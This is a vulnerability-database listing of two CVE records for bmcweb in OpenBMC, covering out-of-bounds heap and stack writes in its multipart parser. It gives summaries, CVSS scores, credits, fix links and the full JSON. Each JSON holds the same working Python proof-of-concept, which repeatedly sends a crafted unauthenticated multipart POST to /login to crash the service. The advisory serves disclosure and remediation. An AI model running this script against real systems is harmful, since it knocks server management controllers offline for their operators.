Search criteria
2 vulnerabilities by OpenBMC Project
CVE-2022-2809 (GCVE-0-2022-2809)
Vulnerability from cvelistv5 – Published: 2022-10-27 13:09 – Updated: 2025-05-05 20:20
VLAI?
Summary
A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.
Severity ?
8.2 (High)
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OpenBMC Project | OpenBMC |
Affected:
2.10 , < Release*
(custom)
|
Credits
Finder: Jakub Rozanski, Intel Corporation
Remediation: Krzysztof Grobelny, Intel Corporation
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T00:52:59.125Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openbmc/bmcweb"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-2809",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-05T20:20:05.867799Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-05T20:20:18.093Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "OpenBMC",
"vendor": "OpenBMC Project",
"versions": [
{
"changes": [
{
"at": "2.13",
"status": "unaffected"
}
],
"lessThan": "Release*",
"status": "affected",
"version": "2.10",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Finder: Jakub Rozanski, Intel Corporation"
},
{
"lang": "en",
"value": "Remediation: Krzysztof Grobelny, Intel Corporation"
}
],
"datePublic": "2022-10-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS."
}
],
"exploits": [
{
"lang": "en",
"value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: \u003cHOST-IP-ADDR-HERE\u003e:8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode(\u0027utf-8\u0027))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\""
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-229",
"description": "CWE-229: Improper Handling of Values",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-122",
"description": "CWE-122: Heap-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-10-27T00:00:00.000Z",
"orgId": "7eaec9cd-e18a-43f9-bb90-5f82d308c514",
"shortName": "OpenBMC"
},
"references": [
{
"url": "https://github.com/openbmc/bmcweb"
}
],
"solutions": [
{
"lang": "en",
"value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56796"
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Unauthenticated out of bounds heap write in bmcweb",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "7eaec9cd-e18a-43f9-bb90-5f82d308c514",
"assignerShortName": "OpenBMC",
"cveId": "CVE-2022-2809",
"datePublished": "2022-10-27T13:09:19.424Z",
"dateReserved": "2022-08-13T00:00:00.000Z",
"dateUpdated": "2025-05-05T20:20:18.093Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-3409 (GCVE-0-2022-3409)
Vulnerability from cvelistv5 – Published: 2022-10-27 13:09 – Updated: 2025-05-05 17:52
VLAI?
Summary
A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. This vulnerability was identified during mitigation for CVE-2022-2809. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS.
Severity ?
8.2 (High)
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| OpenBMC Project | OpenBMC |
Affected:
2.10 , < Release*
(custom)
|
Credits
Finder: Jakub Rozanski, Intel Corporation
Remediation: Krzysztof Grobelny, Intel Corporation
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T01:07:06.708Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://github.com/openbmc/bmcweb"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-3409",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-05T17:50:45.381401Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-05T17:52:19.453Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "OpenBMC",
"vendor": "OpenBMC Project",
"versions": [
{
"changes": [
{
"at": "2.13",
"status": "unaffected"
}
],
"lessThan": "Release*",
"status": "affected",
"version": "2.10",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Finder: Jakub Rozanski, Intel Corporation"
},
{
"lang": "en",
"value": "Remediation: Krzysztof Grobelny, Intel Corporation"
}
],
"datePublic": "2022-10-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in bmcweb of OpenBMC Project allows user to cause denial of service. This vulnerability was identified during mitigation for CVE-2022-2809. When fuzzing the multipart_parser code using AFL++ with address sanitizer enabled to find smallest memory corruptions possible. It detected problem in how multipart_parser handles unclosed http headers. If long enough http header is passed in the multipart form without colon there is one byte overwrite on heap. It can be conducted multiple times in a loop to cause DoS."
}
],
"exploits": [
{
"lang": "en",
"value": "import socket\nimport ssl\nimport time\n\nHOST = \"\" # PROVIDE HOSTNAME or IP ADDRESS OF TARGET BMCWEB\nPORT = 443\n\nlength = 322\nadditional = \"\"\n\npayload = \"\"\"POST /login HTTP/1.1\\r\\nHost: \u003cHOST-IP-ADDR-HERE\u003e:8080\\r\\nUser-Agent: curl/7.58.0\\r\\nAccept: */*\\r\\nContent-Length: %s\\r\\nContent-Type: multipart/form-data; boundary=---------------------------d74496d66958873e\\r\\n\\r\\n-----------------------------d74496d66958873e\\r\\nt-DiPpcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccgccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc%s\\r\\n\\r\\n\"\"\"\n\nif __name__ == \"__main__\":\n\n while(True):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n client = ssl.wrap_socket(client, cert_reqs=ssl.CERT_NONE)\n\n client.connect((HOST, PORT))\n toSend = payload % (str(length), additional)\n print(toSend)\n client.send(toSend.encode(\u0027utf-8\u0027))\n print(client.recv(4096))\n client.close()\n time.sleep(0.01)\n length += 1\n additional += \"a\""
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-121",
"description": "CWE-121: Stack-based Buffer Overflow",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-229",
"description": "CWE-229: Improper Handling of Values",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-10-27T00:00:00.000Z",
"orgId": "7eaec9cd-e18a-43f9-bb90-5f82d308c514",
"shortName": "OpenBMC"
},
"references": [
{
"url": "https://github.com/openbmc/bmcweb"
}
],
"solutions": [
{
"lang": "en",
"value": "https://gerrit.openbmc.org/c/openbmc/bmcweb/+/56868"
}
],
"source": {
"discovery": "INTERNAL"
},
"title": "Unauthenticated out of bounds stack write in bmcweb",
"x_generator": {
"engine": "Vulnogram 0.0.9"
}
}
},
"cveMetadata": {
"assignerOrgId": "7eaec9cd-e18a-43f9-bb90-5f82d308c514",
"assignerShortName": "OpenBMC",
"cveId": "CVE-2022-3409",
"datePublished": "2022-10-27T13:09:19.716Z",
"dateReserved": "2022-10-06T00:00:00.000Z",
"dateUpdated": "2025-05-05T17:52:19.453Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}